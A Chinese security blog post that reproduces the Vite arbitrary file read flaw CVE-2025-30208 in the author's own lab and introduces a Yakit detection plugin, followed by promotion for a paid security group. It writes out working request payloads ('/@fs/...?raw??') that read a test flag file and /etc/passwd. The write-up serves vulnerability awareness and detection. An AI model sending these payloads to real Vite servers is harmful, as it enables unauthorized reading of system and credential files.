[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)

admin
admin
admin
136985
文章
112
评论
2025年3月28日13:22:20评论17 views字数 1264阅读4分12秒阅读模式
[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)

扫码加团队公开群

备注"加群"

本文章由团队成员[Tai]授权并发布
前情提要

Vite 是一个前端开发工具的提供商,在版本 6.2.3 之前的版本(包括 6.1.26.0.125.4.15 4.5.10)存在漏洞。

此绕过漏洞存在于多个地方移除了尾随分隔符(如`?`),但未在查询字符串正则表达式中进行处理。任意文件的内容可以被返回到浏览器。只有那些显式将 Vite 开发服务器暴露在网络中的应用程序(使用 `--host`  `server.host` 配置选项)才会受到影响。

版本 6.2.36.1.26.0.125.4.15  4.5.10 已修复此问题。

正文开始
下班坐地铁的时候刷到这个漏洞,Vite任意文件读取漏洞(CVE-2025-30208)。正好想起我的毕设前端部分也是用Vite构建的,于是回去打开电脑看看项目里的Vite版本,发现版本为6.0.5,刚好是受漏洞影响的版本
[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)

既然环境都有了,那就复现一下

首先,在C盘根目录创建flag.txt文件,用于测试文件读取
[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)
启动项目,发送POC
GET /@fs/C:/flag.txt?import&raw?? HTTP/1.1Host192.168.52.1:9000
功读取到,漏洞存在
[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)
测试一下Linux服务器的,问GPT,快速地用 Vite 6.0.5 版本构建并启动一个 Vue 3 项目
[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)
这里尝试另一个payload后缀:?raw??
GET /@fs/etc/passwd?raw?? HTTP/1.1Host192.168.172.129:5173
也是成功读取到文件
[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)

写个漏洞检测插件,再发包观察一下其他存在漏洞的响应情况

1、读取不存在的文件,响应如下
[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)
2、读取权限不够的文件
[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)

把如上两种情况也加进漏洞存在的判断条件中

最终插件效果
[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)
[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)

插件ID: 7d5eeffa-b1ca-4062-aa17-b807bddb6b19

如有漏报、误报等情况,还请各位师傅们在插件评论区下反馈
下载方法:打开yakit按如下步骤导入插件即可
[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)
[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)
[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)
[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)

内部圈子介绍

我们是C4安全团队,师傅们别忘了关注点赞,团队的成长离不开你们,感谢师傅们,Ciallo~(∠・ω< )⌒★~
[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)
圈子专注于更新SRC挖掘/代码审计相关
[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)

内部圈子专栏介绍

Freebuf知识大陆内部共享资料截屏详情如下

(每周保持更新)

[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)

知识大陆——安全渗透感知大家族

圈子券后现价 ¥49.9元

如果你有兴趣加入,抓住机会不要犹豫,价格只会上涨,不会下跌

圈子人数少于400人 49.9元/年

圈子人数少于600人 69.9元/年

(新人优惠券10,扫码或者私信开头二维码即可领取)

[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)
内部圈子——友反馈
[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)
[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)
团队公开交流群
QQ群和微信群都已建立,方便常用QQ或微信的师傅加入团队公开交流群,交流各类网安、实战方面的问题~
(微信群①群已满200人,需要邀请加开头运营二维码才能加入,②群如下)
[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)

END

关注Code4th安全团队

了解更多网络安全内容~

原文始发于微信公众号(C4安全团队):[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月28日13:22:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)https://cn-sec.com/archives/3893669.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息